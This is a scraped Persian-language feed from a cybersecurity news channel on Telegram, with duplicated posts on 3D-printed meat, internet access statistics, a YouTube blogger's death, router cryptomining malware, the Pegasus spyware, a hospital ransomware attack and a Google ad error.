به منظور چاپ گوشت، کارشناسان "جت ایت" یک چاپگر ویژه سه بعدی طراحی کرده اند.
برای ساخت این چاپگر از کمک یاشار بن شیتریت، مدیر استارت آپ که یک قصاب سابق است استفاده شده است وی تصمیم به استفاده از دانش حرفه ای خود برای ایجاد گوشت مصنوعی، که بافت آن کاملا شبیه به گوشت باشد گرفته است.
وی گفت: گوشت از بافت عضلانی، چربی، میوگلوبین و بافت همبند ساخته شده است و در ادامه توضیح داد: با کمک یک چاپگر سه بعدی و تنظیمات دقیق، ما توانستیم یک ماتریس پیچیده ایجاد کنیم که ساختار گوشت را به طور کامل تکرار کند..
استارت آپ جت ایت در سال 2018 و با 5 کارمند تاسیس شد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
بیش از نیمی از ساکنین زمین به اینترنت دسترسی دارند
در پایان سال 2018، 3.9 میلیارد نفر به اینترنت دسترسی خواهند داشت، یعنی 51.2 درصد از جمعیت جهان.
به گزارش اتحادیه بین المللی مخابرات، مطالعه دیگری که توسط متخصصین سازمان ملل (UN) در زمینه فناوری اطلاعات انجام شد نشان داد که در مدت 13 سال، دسترسی به اینترنت در کشورهای آفریقایی از 2.1 درصد در سال 2005 به 24.4 درصد در سال 2018 افزایش یافته است.
علاوه بر این، دسترسی ساکنان کشورهای توسعه یافته به اینترنت از 51.3 درصد به 80.9 درصد افزایش یافته است و در کشورهای در حال توسعه از 7.7 درصد به 45.3 درصد افزایش یافته است. میانگین نفوذ اینترنت در کشورهای مستقل مشترک المنافع 71.3 درصد و در کشورهای اروپایی 79.6 درصد است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
در پایان سال 2018، 3.9 میلیارد نفر به اینترنت دسترسی خواهند داشت، یعنی 51.2 درصد از جمعیت جهان.
به گزارش اتحادیه بین المللی مخابرات، مطالعه دیگری که توسط متخصصین سازمان ملل (UN) در زمینه فناوری اطلاعات انجام شد نشان داد که در مدت 13 سال، دسترسی به اینترنت در کشورهای آفریقایی از 2.1 درصد در سال 2005 به 24.4 درصد در سال 2018 افزایش یافته است.
علاوه بر این، دسترسی ساکنان کشورهای توسعه یافته به اینترنت از 51.3 درصد به 80.9 درصد افزایش یافته است و در کشورهای در حال توسعه از 7.7 درصد به 45.3 درصد افزایش یافته است. میانگین نفوذ اینترنت در کشورهای مستقل مشترک المنافع 71.3 درصد و در کشورهای اروپایی 79.6 درصد است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
مادربزرگ یوتیوب در گذشت
مستاناما، مسن ترین بلاگر یوتیوب در سن 108 سالگی در گذشت.
مسن ترین بلاگر یوتیوب که دو سال پیش کانال Country Foods را که به آشپزی مربوط می شد را ایجاد کرد.
ساده بودن وی باعث شده بود میلیونها کاربر برنامه های آشپزی او را دنبال کنند.
ایجاد این کانال آشپزی را نوه و دوست او به این زن سالخورده پیشنهاد دادند. او طرز تهیه و رازهای آشپزی دهها نوع غذا را برای دنبال کنندگان خود ارائه داد و در هنگام طبخ غذا تنها از چاقو، ظروف و دیگ معمولی استفاده میکرد. وی حتی در پختن غذا از برگهای درخت موز استفاده میکرد. یکی از غذاهای معروف و این زن، چوچه در هندوانه بود.
این زن مثل بلاگرهای جوان سعی نمیکرد که توجه مردم را به خود جلب کند، بلکه زندگی روزمره و عادی خود را نشان می داد. در حال حاضر کانال یوتیوب وی را 1.2 میلیون کاربر دنبال میکنند و ویدیوهایش بیش از 200 میلیون بار بازدید شده است.
پس از چند ماه طرفداران مادربزرگ اینترنتی از غیبت چند ماه وی ابراز نگران کردند و در نهایت معلوم شد که او پس از مدتی بیماری، درگذشته است.
https://m.youtube.com/watch?feature=youtu.be&v=ZtS7ZrJ_rtk
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مستاناما، مسن ترین بلاگر یوتیوب در سن 108 سالگی در گذشت.
مسن ترین بلاگر یوتیوب که دو سال پیش کانال Country Foods را که به آشپزی مربوط می شد را ایجاد کرد.
ساده بودن وی باعث شده بود میلیونها کاربر برنامه های آشپزی او را دنبال کنند.
ایجاد این کانال آشپزی را نوه و دوست او به این زن سالخورده پیشنهاد دادند. او طرز تهیه و رازهای آشپزی دهها نوع غذا را برای دنبال کنندگان خود ارائه داد و در هنگام طبخ غذا تنها از چاقو، ظروف و دیگ معمولی استفاده میکرد. وی حتی در پختن غذا از برگهای درخت موز استفاده میکرد. یکی از غذاهای معروف و این زن، چوچه در هندوانه بود.
این زن مثل بلاگرهای جوان سعی نمیکرد که توجه مردم را به خود جلب کند، بلکه زندگی روزمره و عادی خود را نشان می داد. در حال حاضر کانال یوتیوب وی را 1.2 میلیون کاربر دنبال میکنند و ویدیوهایش بیش از 200 میلیون بار بازدید شده است.
پس از چند ماه طرفداران مادربزرگ اینترنتی از غیبت چند ماه وی ابراز نگران کردند و در نهایت معلوم شد که او پس از مدتی بیماری، درگذشته است.
https://m.youtube.com/watch?feature=youtu.be&v=ZtS7ZrJ_rtk
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
YouTube
WATERMELON CHICKEN BY MY GRANNY
WATERMELON CHICKEN BY MASTANAMMA
🚨هشدار‼️
415000 مسیریاب آلوده شده با بدافزار cryptomining
📌براساس گزارشات، حدود 415000 مسیریاب در جهان با بدافزاری که پتانسیل دزدیدن منابع کامپیوتر را دارد، آلوده شدهاند.
⭕️این بدافزار بهطور مخفیانه رمزارز استخراج میکند. نرمافزار ماینینگ اصلی استفاده شده در این کمپین CoinHive است که یک استخراجکنندهی Monero است.
🚨توصیه میکنیم که کاربران مسیریاب میکروتیک، فورا آخرین سیستمعامل را از وبسایت رسمی شرکت دانلود و نصب کنند تا از این تهدید ناگهانی در امان بمانند.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
415000 مسیریاب آلوده شده با بدافزار cryptomining
📌براساس گزارشات، حدود 415000 مسیریاب در جهان با بدافزاری که پتانسیل دزدیدن منابع کامپیوتر را دارد، آلوده شدهاند.
⭕️این بدافزار بهطور مخفیانه رمزارز استخراج میکند. نرمافزار ماینینگ اصلی استفاده شده در این کمپین CoinHive است که یک استخراجکنندهی Monero است.
🚨توصیه میکنیم که کاربران مسیریاب میکروتیک، فورا آخرین سیستمعامل را از وبسایت رسمی شرکت دانلود و نصب کنند تا از این تهدید ناگهانی در امان بمانند.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
🔴 از برنامه جاسوسی #Pegasus3 چه میدانید؟
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
کانال تخصصی امنیت سایبری «کتاس»
🔴 از برنامه جاسوسی #Pegasus3 چه میدانید؟ 👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد 🦁«کتاس» http://t.me/ict_security
🔴 از برنامه جاسوسی #Pegasus3 چه میدانید؟
🔸 این برنامه از تولیدات شرکت اسرائیلی NSO Group Technologies است.
🔸 به هر دستگاه #تلفن_همراه از طریق شماره تلفن آن #رخنه میکند.
🔸 میتواند از میکروفون و دوربین تلفن همراه برای ضبط گفتوگوها استفاده و اپلیکیشنهای کدگذاریشدهای همچون واتساپ را شنود کند
🔸 عربستان این برنامه را به قیمت ۵۵ میلیون دلار برای #جاسوسی علیه شهروندانش خریداری کرده است.
🔸 برای رخنه نیازی به لینکهای طعمهگذاری شده ندارد.
🔸 از #باگ های موجود در مودم تلفن همراه یا باگهای اپلیکیشنهای نصبشده در تلفنهای همراه برای رخنه استفاده میکند
🔸 برنامه از الگوریتمهای پیچیدهای که NSO آن را با همکاری دولت اسرئیل نوشته استفاده میکند
🔸 عربستان با استفاده از این برنامه، تلفن همراه مخالفانی همچون خاشقجی، عمر بن عبدالعزیز، یحیی عسیری و... را شنود کرده است.
🔸 اسنودن تاکید کرده که عربستان از طریق این برنامه به جاسوسی علیه خاشقجی پرداخته است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔸 این برنامه از تولیدات شرکت اسرائیلی NSO Group Technologies است.
🔸 به هر دستگاه #تلفن_همراه از طریق شماره تلفن آن #رخنه میکند.
🔸 میتواند از میکروفون و دوربین تلفن همراه برای ضبط گفتوگوها استفاده و اپلیکیشنهای کدگذاریشدهای همچون واتساپ را شنود کند
🔸 عربستان این برنامه را به قیمت ۵۵ میلیون دلار برای #جاسوسی علیه شهروندانش خریداری کرده است.
🔸 برای رخنه نیازی به لینکهای طعمهگذاری شده ندارد.
🔸 از #باگ های موجود در مودم تلفن همراه یا باگهای اپلیکیشنهای نصبشده در تلفنهای همراه برای رخنه استفاده میکند
🔸 برنامه از الگوریتمهای پیچیدهای که NSO آن را با همکاری دولت اسرئیل نوشته استفاده میکند
🔸 عربستان با استفاده از این برنامه، تلفن همراه مخالفانی همچون خاشقجی، عمر بن عبدالعزیز، یحیی عسیری و... را شنود کرده است.
🔸 اسنودن تاکید کرده که عربستان از طریق این برنامه به جاسوسی علیه خاشقجی پرداخته است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
حمله باجافزارها، سامانههای رایانهای را در بیمارستان منطقهای شرق اوهایو و مرکز درمانی دره اوهایو تحتتاثیر قرار داد.
🦁«کتاس»
http://t.me/ict_security
🦁«کتاس»
http://t.me/ict_security
کانال تخصصی امنیت سایبری «کتاس»
حمله باجافزارها، سامانههای رایانهای را در بیمارستان منطقهای شرق اوهایو و مرکز درمانی دره اوهایو تحتتاثیر قرار داد. 🦁«کتاس» http://t.me/ict_security
اورژانس اوهایو در چنگال باجافزارها
یک حمله باجافزاری به بخش اورژانس بیمارستان اوهایو باعث شد این مرکز نتواند به بیماران خود رسیدگی کند.
به گزارش کتاس به نقل ازسایبربان، حمله باجافزارها، سامانههای رایانهای را در بیمارستان منطقهای شرق اوهایو و مرکز درمانی دره اوهایو تحتتاثیر قرار داد. طبق گزارشها، حمله باعث ایجاد اختلال در اورژانس بیمارستان شدهاست.
به گزارش روزنامه تایمز لیدر (The Times Leader)، بدافزار یاد شده، بیمارستان نامبرده را در بعد از ظهر ۲۳ نوامبر مورد حمله قرار داد. این حمله باعث شد که بیمارستان قادر به پذیرش بیماران اورژانسی از طریق امدادگران نباشد.
در روزنامه یاد شده آمدهاست: بهتازگی گروه بیماران اورژانس از بیمارستان منطقهای شرق اوهایو و مرکز درمانی دره اوهایو بهدلیل حمله باجافزاری به سامانه بیمارستان، خارج شدند. گروههای اورژانس منطقه پس از دریافت اطلاعیه خروج کامل بیماران، شروع به انتقال بیماران به دیگر بیمارستان های ناحیه کردهاند.
بیماران به اورژانسهای دیگر بیمارستانهای منطقه منتقل شدهاند. کارین جانیزوفسکی (Karin Janiszewski)، مدیر بازاریابی و روابط عمومی بیمارستانها، توضیح داد که هر دو بیمارستان قادر به رسیدگی به بیماران اورژانسی بدون وقت قبلی بودهاند.
جانیزوفسکی افزود: در حال حاضر، بخش اورژانس بیمارستان ما قادر به پذیرش بیماران از طریق گروه اورژانس نیست؛ اما میتوانیم بیماران بدون وقت قبلی را پذیرش کنیم. گروه فناوری اطلاعات ما تمام وقت روی این مسئله کار میکنند و انتظار میرود که بهزودی، مشکل حل شود.
طبق برنامهریزی کارکنان فناوری اطلاعات، عملکرد معمولی سیستمها تا ۲۵ نوامبر بهطور کامل به حالت اول باز میگردد. خبر خوب این است که هیچ دادهای بر اثر حمله باجافزاری، افشا نشدهاست.
وی ادامه داد: ما از سطح امنیتی بسیار بالایی برخوردار هستیم. به همین دلیل حمله فقط توانست از لایه اول امنیتی عبور کند و نه بیشتر. هیچ شکافی در اطلاعات بیماران وجود ندارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
یک حمله باجافزاری به بخش اورژانس بیمارستان اوهایو باعث شد این مرکز نتواند به بیماران خود رسیدگی کند.
به گزارش کتاس به نقل ازسایبربان، حمله باجافزارها، سامانههای رایانهای را در بیمارستان منطقهای شرق اوهایو و مرکز درمانی دره اوهایو تحتتاثیر قرار داد. طبق گزارشها، حمله باعث ایجاد اختلال در اورژانس بیمارستان شدهاست.
به گزارش روزنامه تایمز لیدر (The Times Leader)، بدافزار یاد شده، بیمارستان نامبرده را در بعد از ظهر ۲۳ نوامبر مورد حمله قرار داد. این حمله باعث شد که بیمارستان قادر به پذیرش بیماران اورژانسی از طریق امدادگران نباشد.
در روزنامه یاد شده آمدهاست: بهتازگی گروه بیماران اورژانس از بیمارستان منطقهای شرق اوهایو و مرکز درمانی دره اوهایو بهدلیل حمله باجافزاری به سامانه بیمارستان، خارج شدند. گروههای اورژانس منطقه پس از دریافت اطلاعیه خروج کامل بیماران، شروع به انتقال بیماران به دیگر بیمارستان های ناحیه کردهاند.
بیماران به اورژانسهای دیگر بیمارستانهای منطقه منتقل شدهاند. کارین جانیزوفسکی (Karin Janiszewski)، مدیر بازاریابی و روابط عمومی بیمارستانها، توضیح داد که هر دو بیمارستان قادر به رسیدگی به بیماران اورژانسی بدون وقت قبلی بودهاند.
جانیزوفسکی افزود: در حال حاضر، بخش اورژانس بیمارستان ما قادر به پذیرش بیماران از طریق گروه اورژانس نیست؛ اما میتوانیم بیماران بدون وقت قبلی را پذیرش کنیم. گروه فناوری اطلاعات ما تمام وقت روی این مسئله کار میکنند و انتظار میرود که بهزودی، مشکل حل شود.
طبق برنامهریزی کارکنان فناوری اطلاعات، عملکرد معمولی سیستمها تا ۲۵ نوامبر بهطور کامل به حالت اول باز میگردد. خبر خوب این است که هیچ دادهای بر اثر حمله باجافزاری، افشا نشدهاست.
وی ادامه داد: ما از سطح امنیتی بسیار بالایی برخوردار هستیم. به همین دلیل حمله فقط توانست از لایه اول امنیتی عبور کند و نه بیشتر. هیچ شکافی در اطلاعات بیماران وجود ندارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
خسارت ۱۰ میلیون دلاری گوگل به خاطر یک مستطیل زرد
🔻آگهی اشتباه یک کارآموز
🔻
روزنامه فایننشال تایمز گزارش داده که خطای یکی از کارآموزان گوگل باعث شد تا یک آگهی اشتباه روی "تعداد پرشماری" از سایتها و اپلیکیشنهای موبایل پخش شود.
این اشتباه، منجر به این شد که یک چهارگوش زرد رنگ خالی چند روز پیش به مدت ۴۵ دقیقه در بسیاری از وبسایتها در آمریکا و استرالیا دیده شود.
اتفاق مذکور زمانی رخ داد که کارآموزان در حال یادگیری این بودند که چگونه با سامانه انتشار آگهی گوگل، از خانه خود کار کنند.
در این حین یکی از کارآموزان در سامانه خرید آگهی گوگل، یک چارگوش زرد را "بیش از میزانی که برایش تعیین شده بود"،برای انتشار فرستاد.
این آگهی بیش از هر تبلیغ دیگر توجه مخاطبان را جلب کرد و از طریق شرکتهای همکار دیگر گوگل بازپخش شد و تعداد مخاطبان آن بیش از پیش گسترش یافت.
پس از آن گوگل در بیانیهای اعلام کرد: "به محض آن که از این اشتباه ناخواسته مطلع شدیم، تلاش کردیم تا پخش آن متوقف شود".
این شرکت در این بیانیه افزود که همه خسارتها و پرداختهایی را که به خاطر این اشتباه صورت گرفته جبران میکند.
هنوز میزان این خسارت مشخص نشده اما تخمین فایننشال تایمز این است که گوگل تقریبا ۱۰ میلیون دلار برای جبران این خطا هزینه خواهد کرد.
https://bbc.in/2EiSblz
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔻آگهی اشتباه یک کارآموز
🔻
روزنامه فایننشال تایمز گزارش داده که خطای یکی از کارآموزان گوگل باعث شد تا یک آگهی اشتباه روی "تعداد پرشماری" از سایتها و اپلیکیشنهای موبایل پخش شود.
این اشتباه، منجر به این شد که یک چهارگوش زرد رنگ خالی چند روز پیش به مدت ۴۵ دقیقه در بسیاری از وبسایتها در آمریکا و استرالیا دیده شود.
اتفاق مذکور زمانی رخ داد که کارآموزان در حال یادگیری این بودند که چگونه با سامانه انتشار آگهی گوگل، از خانه خود کار کنند.
در این حین یکی از کارآموزان در سامانه خرید آگهی گوگل، یک چارگوش زرد را "بیش از میزانی که برایش تعیین شده بود"،برای انتشار فرستاد.
این آگهی بیش از هر تبلیغ دیگر توجه مخاطبان را جلب کرد و از طریق شرکتهای همکار دیگر گوگل بازپخش شد و تعداد مخاطبان آن بیش از پیش گسترش یافت.
پس از آن گوگل در بیانیهای اعلام کرد: "به محض آن که از این اشتباه ناخواسته مطلع شدیم، تلاش کردیم تا پخش آن متوقف شود".
این شرکت در این بیانیه افزود که همه خسارتها و پرداختهایی را که به خاطر این اشتباه صورت گرفته جبران میکند.
هنوز میزان این خسارت مشخص نشده اما تخمین فایننشال تایمز این است که گوگل تقریبا ۱۰ میلیون دلار برای جبران این خطا هزینه خواهد کرد.
https://bbc.in/2EiSblz
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
BBC News فارسی
کلیکباز: خسارت ۱۰ میلیون دلاری گوگل به خاطر یک مستطیل زرد
روزنامه فایننشال تایمز گزارش داده که خطای یکی از کارآموزان گوگل باعث شد تا یک آگهی اشتباه روی "تعداد پرشماری" از سایتها و اپلیکیشنهای موبایل پخش شود. این اشتباه، منجر به این شد که یک چهارگوش زرد رنگ خالی چند روز پیش به مدت ۴۵ دقیقه در بسیاری از وبسایتها…